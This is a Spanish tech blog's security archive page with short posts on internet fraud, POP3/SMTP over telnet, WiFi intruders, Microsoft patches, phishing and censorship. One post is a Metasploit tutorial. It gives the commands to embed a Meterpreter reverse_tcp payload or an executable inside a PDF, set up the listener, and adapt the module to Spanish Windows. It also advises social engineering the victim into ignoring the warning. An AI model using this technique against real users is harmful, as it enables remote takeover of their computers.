Kriptus

Temas de Informática y más cosas…

Archivo de la categoría Seguridad

Aumentan hasta 5 veces las denuncias por fraudes y timos en internet

ago 5

Publicado por kriptus en Internet, Seguridad | No hay comentarios

Las denuncias por timos a través de internet se han quintuplicado este año, según la federación (FUCI).

Así, FUCI afirma que cada vez más usuarios les piden ayuda al haber sido víctimas de las trampas ideadas por empresas cuyo único objetivo es el de lucrarse a través de internet, con juegos, concursos y promociones que exigen dar el número de móvil.

En mi humilde opinión, todo o gran parte de éste problema se solucionaría con una web institucional con o sin videotutoriales que facilitarian el conocimientos de éstas técnicas de engaño y poder así evitarlas.

Internet es una jungla, y lo primero que hay que hacer es recoger información sobre seguridad y aprender como evitar estos problemas; de lo contrario, siempre te van a poder engañar o timar.

Un claro ejemplo de hace no mucho tiempo, fue un publicidad de google en el que aparecía “como averiguar el día de tu muerte”….

Entradas Relacionadas:
  • Internet Explorer 7 ya se encuentra en idioma castellano
  • La evolución de este servicio de comunicación sin cable está al alza de un modo imparable. Además, la posibilidad de usar estos puntos Wi-Fi para la comunicación por voz aumenta su atractivo, por el abaratamiento de costos.
  • Intel y Micron presentan un nuevo chip de memoria
  • Microsoft hace la competencia a Google Earth con su Microsoft Virtual Earth 3D
  • La gran ODISEA para hacer una tramitacion electronica con la administracion estatal o autonomica

    • Etiquetas: , , , , , , ,

    Embebiendo un Ejecutable dentro de un PDF con MetaSploit

    abr 14

    Publicado por kriptus en Internet, Seguridad | No hay comentarios

    En este artículo, vamos a ver como embeber un archivo ejecutable “.exe”, dentro de un archivo PDF, utilizando el módulo “adobe_pdf_embedded_exe” de MetaSploit.
    Leyendo el blog de F-Secure, me encontré con un post sobre PDF maliciosos que estaban siendo utilizados para ataques de espionaje. Al ser abiertos, dropeaban y corrían un archivo ejecutable, en este caso un Poison Ivy que luego se conectaba a una IP de Singapore.

    MetaSploit: adobe_pdf_embedded_exe

    Para testear el comportamiento de nuestros usuarios, ante una amenaza similar a esta, podemos replicar este ataque con el módulo “adobe_pdf_embedded_exe” de MetaSploit, en donde vamos a embeber un archivo ejecutable “.exe”, o un payload de MetaSploit, dentro de un archivo PDF.

    Por supuesto vamos a necesitar realizar un poco de ingeniería social, primero para que la víctima abra el PDF que le enviamos, y luego, para que ignore el warning de seguridad que aparecerá cuando se intente ejecutar el payload malicioso.

    Lo interesante del módulo “adobe_pdf_embedded_exe”, es que nos permitirá embeber el payload en cualquier PDF existente, lo que nos allanará el camino para realizar la ingeniería social. Por ejemplo, podríamos buscar PDF’s existentes de una víctima en particular en Google:

    Otra cosa a tener en cuenta, es que este módulo tiene rank de Excellent, por lo que es una buena opción, ante otros exploits para client side attacks que no son tan estables.

    Embebiendo un Payload de MetaSploit en un PDF

    Para embeber un payload, simplemente lo configuramos como a cualquier otro exploit, solamente debemos tener en cuenta que en la opción “INFILENAME” vamos a poner el path al archivo PDF que queremos utilizar, y en la opción “FILENAME”, el nombre del nuevo archivo PDF con el payload embebido:
    use windows/fileformat/adobe_pdf_embedded_exe
set INFILENAME /tmp/programa.pdf
set FILENAME evil.pdf
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.102
exploit
    Luego deberemos dejar escuchando por la conexión reversa que se va a generar una vez que la víctima abra el PDF:
    ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.102 E
    Cuando la víctima abra el archivo PDF, verá un warning:

    Al momento de presion “Open”, el payload será dropeado en el sistema, y un script intentará correrlo. Como el target de este módulo es Windows XP SP3 English, vemos en el warning que el payload es buscado dentro de “Desktop”, “My Documents” y “Documents”.

    Para que funcione con un XP en español, debemos agregar en el código del módulo, los directorios “Escritorio” y “Mis Documentos”, y volver a generar el PDF:

    # editamos el módulo:
/framework3/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb

# reemplazamos la siguiente línea:
dirs = [ "Desktop", "My Documents", "Documents" ]

# por la siguiente línea:
dirs = [ "Desktop", "My Documents", "Documents", "Escritorio", "Mis Documentos" ]
    Ahora si, se ejecutará el payload, y como podemos ver, lo hicimos con un Windows XP SP2 en Español:
    Si vimos atentamente el warning, pudimos apreciar que al ejecutar el payload dropeado, lo hace de esta forma: “start programa.pdf”.

    El archivo que enviamos a la víctima se llamaba “evil.pdf”, cuando dropeo el payload lo hizo con el nombre “programa.pdf”, como el nombre del PDF verdadero que configuramos oportunamente. En realidad, “programa.pdf” es un archivo “.exe”, con el payload de Meterpreter, pero como el comando “start” puede correr un ejecutable, sin importar la extensión que posea, esta hecho de esta forma para que el ataque pase un poco más desapercibido.

    Embebiendo un Ejecutable en un PDF

    Para embeber un archivo ejecutable dentro de nuestro PDF, simplemente configuramos la opción “EXENAME”. En este caso estamos embebiendo la famosa calculadora de Windows “calc.exe”:
    set EXENAME /tmp/calc.exe
set INFILENAME /tmp/programa.pdf
exploit
    Si bien el PAYLOAD no debería ser necesario configurarlo, ya que no estamos embebiendo un payload sino el ejecutable “calc.exe”, por alguna razón si no lo configuramos no nos deja seguir.
    set PAYLOAD windows/shell/bind_tcp
    Cuando la víctima abra el archivo PDF, verá el warning pero ya con los directorios que agregamos:
    Una vez que la víctima presione “Open”, se correrá el archivo ejecutable que embebimos, el famoso “calc.exe”:

    Eso es todo amigos Smile

    fuente:

    http://kungfoosion.blogspot.com/2010/02/embebiendo-un-ejecutable-dentro-de-un.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+KungFooSion+%28KungFooSion%29

    Entradas Relacionadas:
  • “CUANDO TENGA QUE DAR UNA EXCUSA, QUE SEA CON ELEGANCIA”
  • habia una vez un físico, un biólogo y un químico
  • Cómo crear un paquete ejecutable
  • Microsoft crea un plugin para firefox, ( si es cierto, no es coña )
  • Los virus de la semana 30 Oct-5 de Nov 2006

    • Consultar Correo (pop3) Por Telnet

    abr 8

    Publicado por kriptus en Internet, Seguridad, Software | No hay comentarios

    CONSULTAR EL CORREO (POP3) MEDIANTE TELNET

    1. Conectarse con el cliente telnet al servidor que corresponda.
    El puerto casi siempre es 110.

    2. Identificarse:

    * user nombreDeUsuario
    * pass contraseña
    Sé que es posible enviar la contraseña encriptada, según no se qué RFC que todavía
    no he tenido tiempo de leer…

    3. Ver la lista de mensajes:

    * list
    //este comando devuelve la lista de mensajes y lo que ocupa cada uno en bytes.
    * stats
    //nos dice cuántos mensajes tenemos y cuántos bytes ocupan, en total.

    4. Leer un mensaje:

    * retr mensajeNúmero
    //por ejemplo, retr 1 para el primer mensaje, retr 2 para el segundo.
    * top mensajeNúmero númeroDeLíneas
    //para leer las primeras líneas del mensaje (además de todos los encabezados).

    5. Borrar un mensaje:

    * dele mensajeNúmero
    //Muy útil si nos han mandado un mail de tropecientos megas que no nos interesa en absoluto.
    //El mensaje no se borra hasta que terminamos la sesión con quit.
    * rset
    //Recupera un mensaje que hemos marcado para borra con dele, antes de cerrar la sesión.

    6. Terminar la sesión:

    * quit

    ENVIAR CORREO (SMTP) MEDIANTE TELNET

    1. Conectarse con el cliente telnet al servidor que corresponda.
    El puerto casi siempre es 25.

    2. Saludar:

    * ehlo tuNombre
    * helo tuNombre
    //Cualquiera de estos dos comandos sirve para iniciar una sesión SMTP.

    3. Escribir un mensaje:

    * mail from: emilio@delRemite.nte
    //Así indicamos quién es el remitente. Podría explicar qué sistemas utilizan los
    servidores
    SMTP para comprobar que esta información es cierta, pero no lo voy a hacer.
    El que quiera enviar correos anónimos o falsificados, que se busque la vida Wink.
    * rcpt to: emilio@delDestinata.rio
    //Así indicamos a quién va dirigido el correo.
    * data
    //Después de este comando, empezamos a escribir el correo. Para terminar,
    escribimos un punto ( . ) en una línea aparte.

    4. Añadir cabeceras:

    //Podemos añadir más cabeceras, como el nombre del remitente o del
    destinatario. Éstas
    son sólo relevantes para los clientes de correo, pero al servidor no le importan
    en absoluto,
    así que van al principio del cuerpo del mensaje (es decir, después de empezar el
    mensaje con data).
    * subject: elAsunto
    //Para indicar el subject o asuntod del mensaje.
    * from: miNombre
    //Para indicar que me llamo miNombre y mi correo electrónico es
    emilio@delRemite.nte.
    * to: elNombreDelOtro
    //Para indicar que el correo va dirigido a elNombreDelOtro y su dirección de
    correo es emilio@delDestinata.rio.
    //Ya os imagináis que las direcciones de correo indicadas aquí no tienen por qué
    coincidir con las indicadas en el apartado 3. En cualquier caso, el que reciba el mensaje va a poder ver todas las cabeceras.

    5. Cancelar:

    * rset
    //igual que en POP3, este comando sirve para cancelar cualquier cambio que se
    haya hecho durante la sesión.

    6. Terminar la sesión:

    * quit

    7. Ejemplo

    //Pego tal cual una sesión telnet en la cual me he enviado un correo a mí mismo,
    por si hay
    algo que no queda claro. Las líneas que comienzan con “>” son las que envía el
    servidor, y las que empiezan con “.” son las que envío yo.

    > 220 rita.puntoycoma.net ESMTP service ready [2] using MDaemon v3.0.4 R . helo _jlg

> 250 rita.puntoycoma.net Hello _jlg, pleased to meet you . mail from:
_jlg@puntoycoma.net

> 250 <_jlg@puntoycoma.net>, Sender ok . rcpt to: _jlg@puntoycoma.net

> 250 <_jlg@puntoycoma.net>, Recipient ok . data

> 354 Enter mail, end with . . subject: Ningún asunto en particular

. from: Yo mismo <_jlg@puntoycoma.net>

. to: Mí mismo <_jlg@puntoycoma.net>

. Esto es una prueba.

. Esto es la segunda línea de la prueba.

. .

> 250 Ok, message saved . quit

> 221 See ya in cyberspace

  //Como veis, el servidor siempre contesta un código de tres cifras, que es significativo para los clientes de correo electrónico, seguidos de un texto que, en realidad, no tiene ninguna importancia.
  //Y así es como veo el correo en mi cliente (Pegasus Mail):

Date sent: Tue, 22 Aug 2000 11:29:24 -0400
Subject: Ningún asunto en particular
From: Yo mismo <_jlg@puntoycoma.net>
To: Mí mismo <_jlg@puntoycoma.net>

Esto es una prueba.
Esto es la segunda línea de la prueba.
    Entradas Relacionadas:
  • El Virus informático más difundido en Diciembre fue tarjeta felicitación
  • pasos si quieres montar un servidor de correo
  • Que te parece Gmail de 15 GB
  • Usuarios de correo de Yahoo podrán mandar mensajes a móviles
  • Como crear cuentas de correo temporales para evitar spam

    • Con la crisis aumenta el pirateo o hacking de redes wifi

    ene 22

    Publicado por kriptus en Redes, Seguridad | No hay comentarios

    Parece que los efectos colaterales de la crisis no dejan de sorprender a propios y extraños, y es que si ya hace algún tiempo que comentábamos que muchos usuarios intentaban conectarse a las redes WiFi, de los routers de sus vecinos para usurpar el ancho de banda de sus conexiones ADSL, la necesidad por parte de muchos usuarios de dar de baja sus conexiones de internet para ahorrar gastos familiares, está provocando que el ingenio de muchos usuarios, se centre principalmente en entrar en la red WiFi del vecino.

    Como parte intrínseca de la red, ADSLNet, considera que la mejor prevención es la detección. Normalmente el patrón del usuario que intenta penetrar en la Red WiFi del vecino, tiene como primera intención la utilización de su línea para su propio beneficio, pero una vez en red local, el intruso, es muy peligroso, y del uso del ADSL del vecino, se pasa al intento de penetrar en sus PC’s, y obtener información sensible.

    La curiosidad del ser humano no tiene límites, y no podemos presuponer que por naturaleza, quienes quieren reutilizar nuestra conexión, vienen a ello de ‘ buen rollito ‘.

    Así que lo mejor es detectar. En este sentido ADSLNet dispone de su herramienta ANT 3.1, completamente gratuita, y que entre sus muchas funcionalidades, como la mejora y optimización del rendimiento de las líneas de banda ancha, adsl, cable, y la posibilidad de evaluarlas, haciendo mediciones y tests de velocidad, se incluye también, un sistema de monitorización de intrusos para nuestra red WiFi.

    Os animamos a que lo utilicéis hasta que el chaparrón escampe.

    via: adslnet.es

    Entradas Relacionadas:
  • Caidas generalizadas en los beneficios por adsense de muchas paginas web
  • 1.000.000 de BackTracks sueltos
  • Las redes sociales concentran el 20% del tiempo en internet
  • Solucion al problema de wifi con acceso solo local
  • Windows vista y su error wifi con acceso solo local

    • Etiquetas:

    Actualizacion y parches de seguridad de microsoft

    ago 13

    Publicado por kriptus en General, Microsoft, Seguridad, Windows, windows vista | No hay comentarios

    Microsoft Corp. lanzará nueve parches de seguridad la próxima semana, incluyendo seis actualizaciones críticas para Windows, Office, Internet Explorer y su software de desarrollo Visual Basic.

    Las actualizaciones vendrán como parte del proceso mensual de parches regulares de Microsoft y estará disponible para los clientes el martes por la mañana, hora del Pacífico.

    Las actualizaciones menos serias también serán para Windows, Windows Vista y Virtual PC de Microsoft y el software de Virtual Server, dijo Microsoft en una nota de los parches de actualización publicada el jueves.

    Con nueve conjuntos de parches, agosto será un mes ocupado para los administradores de sistemas.

    Microsoft lanzó solo seis actualizaciones en julio y en promedio ha tenido tiene siete actualizaciones por mes este año.

    Entradas Relacionadas:
  • Pequeña actualizacion de la pagina
  • Acoso de microsoft a los piratas
  • Microsoft parchea 5 vulnerabilidades y una afecta directamente a Windows Vista)
  • Microsoft publicará seis actualizaciones para Windows
  • Internet Explorer 6 lleva 284 días inseguro

    • Cuidado con el phising, ahora estan enviando correo intentando pasarse por Hacienda

    abr 24

    Publicado por kriptus en Antivirus, Internet, Seguridad, Virus, ultima hora | No hay comentarios

    Desde aqui quiero avisar a todos los posibles visitantes de esta web ya que he recibido un par de email falsos (phising) intentando pasarse por la agencia tributaria para poder conseguir los datos de tarjetas de creditos y tambien los datos personales.

    TENED CUIDADO Y NO DEIS VUESTROS DATOS.

    Entradas Relacionadas:
  • Google esta perdiendo el norte
  • Cuidado cuando te regalen condones contra el sida
  • pasos si quieres montar un servidor de correo
  • Que te parece Gmail de 15 GB
  • Una nueva lluvia de spam salpica el espíritu navideño

    • ¿llegaremos a tener censura en internet en españa?

    abr 21

    Publicado por kriptus en Rarezas, Seguridad | No hay comentarios

    El Gobierno no ha tardado ni una semana en presentar una alternativa corregida y aumentada de su artículo 17 bis, en el que se propone que las asociaciones de gestión de derechos de autor –Sgae y otras- se constituyan en censoras de Internet al margen de los jueces.

    ¿llegaremos a tener censura en internet en españa?

    Lo veremos proximamente…..

    Via: Internautas.org

    Entradas Relacionadas:
  • 24 horas contra la censura en Internet
  • ¿En españa hay censura de sitios web?
  • Bango y Vodafone España y Orange España, el mercado español de móviles se ha unido
  • El 45% de sitios web en español pertenecen a España
  • Yahoo! lanza su servicio de vídeo en España